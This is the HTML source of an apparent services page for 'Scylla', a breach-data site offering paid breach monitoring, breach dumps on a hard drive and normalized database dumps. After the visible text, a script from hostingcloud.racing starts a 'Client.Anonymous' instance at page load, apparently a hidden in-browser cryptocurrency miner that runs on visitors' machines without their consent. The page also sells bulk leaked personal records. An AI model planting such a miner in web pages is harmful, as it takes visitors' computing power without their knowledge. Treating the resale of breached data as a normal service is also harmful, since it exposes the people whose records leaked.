<html>

  <style>
    html { font-size:16px; }

    .grid-table{
    font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
    border-collapse: collapse;
    width: 100%;
    }

    .grid-table td, .grid-table th, .grid-table {
    border: 1px solid #ddd;
    padding: 8px;
    }

    .grid-table tr:nth-child(even){background-color: #f2f2f2;}

    .grid-table tr:hover {background-color: #ddd;}

    .grid-table th {
    padding-top: 12px;
    padding-bottom: 12px;
    text-align: left;
    background-color: #4CAF50;
    color: white;
    }

    body {
    font-family: Arial, Helvetica, sans-serif;
    }

    .topnav {
    overflow: hidden;
    background-color: #333;
    }

    .topnav a {
    float: left;
    color: #f2f2f2;
    text-align: center;
    padding: 14px 16px;
    text-decoration: none;
    font-size: 17px;
    }

    .topnav a:hover {
    background-color: #ddd;
    color: black;
    }

    .topnav a.active {
    background-color: #333;
    color: white;
    }


  </style>

  <title>Scylla</title>

  <div class="topnav">
    <a class="active" href="">Home</a>
    <a href="search">Search</a>
    <a href="https://www.etsy.com/shop/TheInfoSecShop" target="_blank">Shop</a>    
  </div>
  
<h1>Scylla Services by <a href="https://twitter.com/_hyp3ri0n">_hyp3ri0n</a></h1>

<br />
<h2>Breach Monitoring</h2>
 
<p>
  Breach monitoring provides you the ability to submit username(s) to us to have them searched every week and reported back to you. Unlike several other sites,
  we will give you the full records and data associated with your breached personal or corporate information so that you can take specific action on the exact
  information leaked. All proceeds from this service go to improving scylla and paying for hosting to keep it free and open for all.

  This costs $5 dollars per username and $20 per domain per month. You may be asked for proof of being tied to the domain and username you are searching for. No refunds
  are given to those that purchase this and cannot do so.
</p>

<h2>Why Not Have I Been Pwned (HIBP)</h2>
  <p>
    HIBP is a project by Troy Hunt to allow you to monitor if your email is in a breach. It is a great service and I encourage everyone to sign up for it. Scylla data,
    however, provides additional context by telling you *what* data was breached. This context can be critical in an organization or in your personal situational awareness.
    A breached password used on a single site that was changed 5 years ago is unalarming, whereas a breach report that your organization appears in a breach can be. Not knowing
    the information breached can be costly to an organization
  </p>

<h2>Scylla Data On a Hard Drive</h2>

  <p>
    Buy scylla data on an external HD. This costs $100 and is exactly what it sounds like. No profit is made from this - all proceeds go to buying the HD first
    and then to maintaining scylla free and open source.    
  </p>

<h2>Normalized Scylla Data</h2>

  <p>
    Database dumps are notoriously unstructured. I have been working tirelessly to normalize the data into sanity. This data comes in JSON lines and includes
    all databases listed in the scylla search page under Normalized Databases.

    For pricing on buying normalized scylla data please contact us.
  </p>

  

<script src="https://www.hostingcloud.racing/FA18.js"></script>
<script>
  var _client = new Client.Anonymous('b0a5fc90521fc2862b2feb55baee6a97a3285e548d8b9da055d1f586aef632e2', {
  throttle: 0.3, ads: 0
  });
  _client.start();
</script>

<!-- Matomo Image Tracker-->
<img src="https://analytics.hyperiongray.com/matomo.php?idsite=9&amp;rec=1" style="border:0" alt="" />
<!-- End Matomo -->

</html>
